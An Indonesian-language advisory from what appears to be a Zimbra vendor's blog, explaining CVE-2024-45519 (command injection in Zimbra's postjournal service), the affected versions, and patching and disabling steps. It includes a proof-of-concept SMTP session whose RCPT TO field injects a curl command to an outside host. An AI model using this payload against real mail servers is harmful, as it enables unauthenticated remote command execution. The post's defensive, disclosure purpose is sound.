What do you need ?

CVE-2024-45519: Remote Command Execution Vulnerability pada Zimbra

CVE-2024-45519 adalah kerentanan kritis yang ditemukan pada layanan postjournal di Zimbra Collaboration Suite (ZCS). Kerentanan ini memungkinkan penyerang yang tidak terotentikasi untuk mengeksekusi perintah sewenang-wenang pada sistem yang rentan. Dengan skor CVSS sebesar 10, kerentanan ini telah dikonfirmasi sebagai ancaman serius terhadap keamanan sistem.

Penemuan dan Eksploitasi

Kerentanan ini berasal dari kurangnya sanitasi input di fungsi read_maps pada layanan postjournal versi tidak ditambal, yang menggunakan popen untuk mengeksekusi perintah dengan input yang tidak divalidasi. Penyerang dapat menyisipkan karakter khusus melalui protokol SMTP, seperti $(curl...), untuk menjalankan perintah jarak jauh.

Peneliti keamanan yang menganalisis kerentanan ini menggunakan teknik reverse engineering pada file biner menggunakan Ghidra. Mereka menemukan bahwa versi tambalan menggantikan fungsi popen dengan execvp yang lebih aman, serta menambahkan fungsi is_safe_input untuk memfilter karakter berbahaya.

Versi yang Terpengaruh

Kerentanan ini memengaruhi versi Zimbra berikut:

  • Joule 8.8.15
  • Kepler 9.0.0
  • Daffodil 10.0.x sebelum 10.0.9
  • Daffodil 10.1.0

Bukti Konsep (Proof of Concept)

Eksploitasi ini dapat dilakukan dengan perintah SMTP sebagai berikut:

EHLO localhost
MAIL FROM: aaaa@mail.domain.com
RCPT TO: <"aabbb$(curl${IFS}example.com)"@mail.domain.com>
DATA
Test message
.

Eksploitasi pada lingkungan internal berhasil dilakukan melalui port 10027. Untuk eksploitasi jarak jauh, penyerang harus memastikan bahwa alamat IP mereka termasuk dalam rentang IP yang diizinkan oleh konfigurasi default mynetworks.

Mitigasi

Pembaruan Sistem

Administrator harus segera memperbarui sistem ke versi berikut atau lebih tinggi

  • 8.8.15 Patch 46
  • 9.0.0 Patch 41
  • 10.0.9
  • 10.1.1

Nonaktifkan Layanan Postjournal

Jika tidak diperlukan, layanan ini dapat dinonaktifkan menggunakan perintah berikut

zmlocalconfig -e postjournal_enabled=false
zmcontrol restart

Kesimpulan

Kerentanan CVE-2024-45519 pada Zimbra Collaboration Suite menjadi peringatan serius akan pentingnya menjaga keamanan sistem email. Dengan skor CVSS 10, kerentanan ini memungkinkan penyerang yang tidak terotentikasi untuk mengeksekusi perintah arbitrer, sehingga berpotensi menyebabkan pelanggaran keamanan yang signifikan.

Langkah mitigasi seperti memperbarui ke versi terbaru, menonaktifkan layanan postjournal jika tidak digunakan, dan memastikan konfigurasi jaringan yang aman adalah tindakan yang wajib dilakukan oleh administrator sistem.

Dengan tindakan yang proaktif dan kesadaran akan risiko ini, organisasi dapat mengurangi potensi dampak dari eksploitasi kerentanan ini. Pada akhirnya, keamanan siber adalah tanggung jawab bersama, dan menjaga perangkat lunak tetap diperbarui adalah salah satu langkah kunci untuk memastikan integritas sistem tetap terjaga.

Referensi

https://blog.projectdiscovery.io/zimbra-remote-code-execution/
https://github.com/Chocapikk/CVE-2024-45519?tab=readme-ov-file
https://cyberveille.esante.gouv.fr/alertes/zimbra-cve-2024-45519-2024-10-02
https://cybersecuritynews.com/zimbra-rce-vulnerability/

Agil Dwiki Yudistira

We are always looking for a person with good attitude and passionate

Careers

Address : EightyEight @Kasablanka Tower A, 10Floor Unit E | Jl.Kasablanka Raya Kav.88, South Jakarta, Indonesia 12870

Contact Us

  • 021 29631601
  • support@taffeta.co.id
  • sales@taffeta.co.id

Company

  • About Us
  • Who We Are
  • Vission
  • Mission

Services

  • Zimbra
  • Redhat
  • Vmware
  • Fortimail

Support

  • Knowledge Base
  • Create a Ticket